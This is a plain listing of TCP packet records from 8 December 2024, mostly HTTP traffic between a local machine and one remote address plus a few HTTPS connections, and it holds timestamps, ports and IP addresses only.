Dec 8, 2024 13:31:49.615381002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.615456104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.615478992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.615524054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.616039038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.616103888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.616125107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.616164923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.616934061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.616997004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.617012978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.617053986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.617759943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.617824078 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.617861032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.617939949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.618602991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.618664026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.618663073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.618702888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.619460106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.619524956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.619586945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.619626999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.620304108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.620368004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.620404959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.620448112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.621153116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.621217012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.621294022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.621372938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.621994972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.622060061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.622139931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.622308016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.622838020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.622898102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.622958899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.623076916 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.623697042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.623764038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.623795033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.623920918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.624651909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.624713898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.624746084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.624783039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.625477076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.625540972 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.625579119 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.625617027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.626256943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.626313925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.626379967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.626418114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.627177954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.627223015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.627262115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.627304077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.627959013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.628127098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.628174067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.628801107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.628849030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.628884077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.628935099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.768676996 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.813291073 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.951504946 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.951515913 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.951953888 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.951958895 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.962236881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.044013023 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:50.044078112 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:50.044883966 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:50.044935942 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:50.044943094 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:50.044979095 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:50.081727028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.113004923 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:50.113023043 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:50.113033056 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:50.113065958 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:50.127137899 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:50.127171993 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:50.127348900 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:50.127882957 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:50.127897024 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:50.213809967 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.214241028 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.214255095 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.214459896 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.214725018 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.214751005 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.214818001 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.214822054 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.215193987 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.215200901 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.267350912 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.267410040 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.267561913 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.267623901 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.267640114 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.267651081 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.267656088 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.270155907 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.270194054 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.270265102 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.270385981 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.270395994 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.405097008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.405168056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.405258894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.405312061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.405484915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.405653954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.405698061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.406372070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.406435013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.406524897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.406574965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.407156944 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.407202959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.407229900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.407273054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.407993078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.408042908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.408082008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.408240080 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.408812046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.408863068 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.408957958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.409008980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.409699917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.409794092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.409859896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.409935951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.410564899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.410614014 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.410649061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.410692930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.411412954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.411472082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.411519051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.412400007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.412444115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.412555933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.412703037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.413530111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.413577080 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.413645029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.413680077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.414424896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.414475918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.414558887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.414604902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.415103912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.415167093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.415169954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.415215015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.415682077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.415775061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.415781975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.415884018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.416485071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.416529894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.416585922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.416636944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.417361975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.417464972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.417479038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.417512894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.418220043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.418268919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.418312073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.418353081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.419056892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.419105053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.419153929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.419310093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.419924974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.419972897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.420002937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.420049906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.420773029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.420825958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.420941114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.420991898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.421596050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.421639919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.421710968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.421763897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.422524929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.422579050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.422626019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.422669888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.423331976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.423407078 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.423430920 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.423475027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.424160004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.424209118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.424228907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.424264908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.425038099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.425086021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.425124884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.425168991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.425864935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.425924063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.425959110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.426074028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.426712036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.426757097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.426810026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.426878929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.427644014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.427691936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.427728891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.427769899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.428422928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.428466082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.428548098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.428595066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.429280043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.429327011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.429332018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.429372072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.430145979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.430193901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.430227995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.430269003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.430995941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.431046009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.431073904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.431111097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.431813002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.431862116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.431900024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.431950092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.432689905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.432755947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.432784081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.432831049 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.433537960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.433583021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.433594942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.433638096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.434392929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.434442997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.434494972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.434570074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.435244083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.435354948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.435391903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.435450077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.436093092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.436213017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.436256886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.436933994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.436990023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.437109947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.437158108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.437977076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.438034058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.438076973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.438121080 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.438647985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.438704014 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.438735962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.438811064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.439464092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.439568043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.439620972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.439661980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.440376043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.440422058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.440457106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.440670013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.441206932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.441263914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.441298962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.441350937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.442125082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.442197084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.442224026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.442243099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.442986012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.443078041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.443125010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.444037914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.444091082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.444128990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.444323063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.445133924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.445173025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.445283890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.445379019 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.445934057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.445991039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.446027994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.446069002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.446599007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.446645975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.446666956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.446710110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.447642088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.447772980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.447913885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.447959900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.448890924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.448930025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.449039936 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.449084997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.449608088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.449661970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.449698925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.449762106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.450136900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.450184107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.450239897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.450290918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.450954914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.451001883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.451037884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.451078892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.451540947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.451631069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.597435951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.597510099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.597567081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.597620964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.597793102 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.597851992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.598053932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.598144054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.598716974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.598764896 CET	49835	80	192.168.2.6	185.215.113.206
